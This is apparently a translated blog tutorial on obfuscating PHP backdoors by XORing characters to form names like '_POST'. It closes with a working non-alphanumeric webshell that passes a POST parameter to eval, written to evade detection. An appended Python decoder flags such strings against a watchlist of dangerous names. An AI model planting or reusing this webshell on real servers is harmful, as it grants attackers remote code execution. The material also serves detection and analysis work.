Look at this:
<?php
echo "A" ^ "}";
?>
Run this code and the output is the character "<", because the code XORs the character "A" with the character "}". In PHP, when two strings are XORed, each string is converted to binary, the XOR is performed, and the result is converted from binary back to a string. XOR operations are sometimes used to swap the values of two variables.
As we all know, PHP is a weakly typed language: we do not have to declare the type of a variable in advance, and can declare a variable and initialize or assign it directly. Because of this weak typing, PHP implicitly converts variable types, and we can use this feature for some unconventional operations, such as converting an integer to a string, treating a Boolean as an integer, or using a string as a function. Let's look at a piece of code:
<?php
$_++;
$__ = "<" ^ "}";
$__("stuff");
?>
This code may look very confusing, so let me explain it briefly:
(1) $_++; This line increments the variable named "_". In PHP the default value of an undefined variable is null, and null == false == 0, so by incrementing an undefined variable we can get a number without using any digits.
(2) $__ = "<" ^ "}"; This XORs the characters "<" and "}" and stores the result, A, in the variable named "__" (two underscores).
(3) $__("stuff"); After the assignment above, the value of the variable $__ is A, so this line can be read as A("stuff"). In PHP this line is a call to function A, but because the program does not define function A, it throws a fatal error and stops the program. The line does nothing useful, but it is simple enough to show that in PHP we can treat a string as a function.
Having read this far, similar PHP backdoors should no longer be so confusing: you can analyze the backdoor code one statement at a time to understand what the backdoor is meant to do. If you are still confused, that indicates that this rookie article is not good; let me say sorry first, but I still hope you won't scold me.
The example above ends in an error that stops the program. Writing a broken program is of course not our purpose; the main purpose of this kind of backdoor is to build useful strings that can bypass detection, such as "_POST", "system", "call_user_func_array", or anything else we need.
Here is a very simple non-alphanumeric PHP backdoor:
@$_++; // $_ = 1
$__ = ("#" ^ "|"); // $__ = _
$__ .= ("." ^ "~"); // _P
$__ .= ("/" ^ "`"); // _PO
$__ .= ("|" ^ "/"); // _POS
$__ .= ("{" ^ "/"); // _POST
@eval(${$__}[!$_]); // password: 0
A serving knife.
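For the defender's side, the following added example (not part of the original article) statically decodes the XORed string literals in PHP source and reports variables that end up holding names such as _POST. The function names, regular expressions and watchlist are assumptions of this example, and the sample input is constructed from the string-building lines of the backdoor above.

```python
import re

# One quoted PHP string literal (no escape handling: an assumption that
# is sufficient for the single-character operands used in the article).
LIT = r'''(?:"([^"\\]*)"|'([^'\\]*)')'''
XOR_EXPR = re.compile(LIT + r'\s*\^\s*' + LIT)
# Matches  $var = expr;  and  $var .= expr;
ASSIGN = re.compile(r'(\$\w+)\s*(\.?=)\s*([^;]*);')
# Hypothetical watchlist of names an obfuscated script may try to hide.
WATCHLIST = {"_POST", "_GET", "_REQUEST", "_COOKIE", "SYSTEM", "EVAL",
             "ASSERT", "CALL_USER_FUNC_ARRAY"}

def php_xor(a: str, b: str) -> str:
    """PHP string ^ string: bytewise XOR, truncated to the shorter operand."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))

def recover_strings(src: str) -> dict:
    """Rebuild the string each variable holds after XOR assignments."""
    values = {}
    for var, op, expr in ASSIGN.findall(src):
        parts = [php_xor(m[0] or m[1], m[2] or m[3])
                 for m in XOR_EXPR.findall(expr)]
        if not parts:
            continue  # assignment without XORed literals: not tracked
        piece = "".join(parts)
        values[var] = values.get(var, "") + piece if op == ".=" else piece
    return values

def suspicious(src: str) -> list:
    """Variables whose recovered value is on the watchlist."""
    return sorted(v for v, s in recover_strings(src).items()
                  if s.upper() in WATCHLIST)

# Constructed sample: string-building lines of the backdoor shown above.
SAMPLE = r'''
@$_++;
$__=("#"^"|");
$__.=("."^"~");
$__.=("/"^"`");
$__.=("|"^"/");
$__.=("{"^"/");
'''

if __name__ == "__main__":
    print(recover_strings(SAMPLE))
    print(suspicious(SAMPLE))
```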
This article is from the "Refresh" 2012 blog; to reprint, please contact the author!